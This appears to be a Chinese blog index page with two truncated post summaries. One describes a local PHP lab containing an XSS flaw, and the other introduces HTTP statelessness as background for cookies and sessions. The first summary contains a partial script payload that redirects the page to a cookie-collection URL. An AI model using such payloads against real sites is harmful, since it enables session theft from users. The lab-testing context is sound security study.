摘要： 测试内容： 本次测试环境，搭建一个包含XSS漏洞的php环境。 地址： http://localhost/home.php 如图所示： 存在xss漏洞，获取cookie的代码为： <script>document.location = 'http://localhost/cookie_collect 阅读全文

摘要： 随着B/S的普及，我们平时上网都是依赖于http协议完成，而Http是无状态的，即同一个会话的连续两个请求互相不了解，他们由最新实例化的环境进行解析，除了应用本身可能已经存储在全局对象中的所有信息外，该环境不保存与会话有关的任何信息，http是不会为了下一次连接而维护这次连接所传输的信息的。所以为了 阅读全文